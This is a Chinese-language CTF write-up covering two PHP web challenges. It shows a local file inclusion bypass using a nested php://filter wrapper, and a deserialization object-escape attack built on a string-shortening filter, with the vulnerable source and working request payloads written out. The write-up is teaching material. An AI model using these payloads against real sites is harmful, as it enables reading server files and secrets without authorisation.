知识点
-
strpos() 函数
- 语法:strpos(string,find,start)
- 参数:
- 作用:
反序列化的对象逃逸问题一般分为两种~~,首先是过滤函数分为两种情况
- 第一种为
关键词数增加
例如: where->hacker,这样词数由五个增加到6个 - 第二种为
关键词数减少
例如:直接过滤掉一些关键词
25-1 [BSidesCF 2020]Had a bad day
做题思路
首先点开发现两个按钮,然后点开之后会出现图片,url中
猜测有注入,或文件包含,弹出include报错,那就是文件包含了
利用php://filter伪协议读取源码
报错了发现后缀多了,于是去掉后缀,base64解码得到源码
<html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="description" content="Images that spark joy"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <title>Had a bad day?</title> <link rel="stylesheet" href="css/material.min.css"> <link rel="stylesheet" href="css/style.css"> </head> <body> <div class="page-layout mdl-layout mdl-layout--fixed-header mdl-js-layout mdl-color--grey-100"> <header class="page-header mdl-layout__header mdl-layout__header--scroll mdl-color--grey-100 mdl-color-text--grey-800"> <div class="mdl-layout__header-row"> <span class="mdl-layout-title">Had a bad day?</span> <div class="mdl-layout-spacer"></div> <div> </header> <div class="page-ribbon"></div> <main class="page-main mdl-layout__content"> <div class="page-container mdl-grid"> <div class="mdl-cell mdl-cell--2-col mdl-cell--hide-tablet mdl-cell--hide-phone"></div> <div class="page-content mdl-color--white mdl-shadow--4dp content mdl-color-text--grey-800 mdl-cell mdl-cell--8-col"> <div class="page-crumbs mdl-color-text--grey-500"> </div> <h3>Cheer up!</h3> <p> Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up! </p> <div class="page-include"> <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){ include ($file . '.php'); } else{ echo "Sorry, we currently only support woofers and meowers."; } } ?> </div> <form action="index.php" method="get" id="choice"> <center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button> <button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center> </form> </div> </div> </main> </div> <script src="js/material.min.js"></script> </body> </html>
审计发现 传入的
category
需要有woofers
,meowers
,index
才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php
尝试直接读取/index.php?category=woofers/../flag
用index不可以得到下面的东西,但是没报错,所以应该是和代码有关,导致显示不同
发现显示不一样了,打开源码发现这个
是否能读取这个flag,便继续利用
php://filter伪协议读取flag,这里还涉及到php伪协议的嵌套使用/index.php?category=php://filter/read=convert.base64-encode/index/resource=flag
最后解密即可得到flag
25-2 [安洵杯 2019]easy_serialize_php
做题思路
审计代码,首先发现
于是直接查看phpinfo,直接搜一些敏感点,fopen、disable_、root等等。第二行看到了独特的文件名。
拿到文件名,接下来就该想办法读取了
读取是有前提的,$function我们可以通过 $f 直接赋值,么的影响。
现在我们就要base64_decode($userinfo[‘img’])=d0g3_f1ag.php。
那么就要$userinfo[‘img’]=ZDBnM19mMWFnLnBocA==。
而$userinfo又是通过$serialize_info反序列化来的。
$serialize_info又是通过session序列化之后再过滤得来的。
session里面的img在这里赋值,我们指定的话会被sha1哈希,到时候就不能被base64解密了。这里就到了一个难点了。
我们看到上面的过滤函数,会把一些长度的字符替换为0,这个和之前做过的这个题有异曲同工之处[0CTF 2016]piapiapia WP(详细),不过之前的那个题是变长,这个是变短。
直接看payload分析比较容易理解:
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
因为有变量覆盖漏洞,所以它可以直接这样被赋值进去。
然后session被序列化之后会变成这样:
a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:68:"a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}
然后这串字符串经过过滤函数之后,会变成:
a:3:{s:4:"user";s:24:"";s:8:"function";s:68:"a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}
可以看到,24后面的6个flag被替换为空了,但是指定的长度还是24,怎么办呢?它会往后吞,不管什么符号,都吞掉24个字符。吞完之后变成了这样。
a:3:{s:4:"user";s:24:"";s:8:"function";s:68:"a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}
看,括号里的字符串就变成了user的值,这时候我们自己输入的function参数和img参数,就把真的参数替代掉了
注意格式,我看别人的WP没有function参数也是可以的,但是必须要凑够3个参数,因为一开始序列化的时候指定了有3个参数 。
get传 f=show_image,
post传:_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
查看源代码发现了新的文件,不能直接打开,给它进行base64编码(编码的时候 “/” 也要一起带进去),然后替换掉img的值,计算一下长度,都是20,那不用改长度了。
所以最后的结果是:
get传 f=show_image,
post传:_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:7:"H9_dawn";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}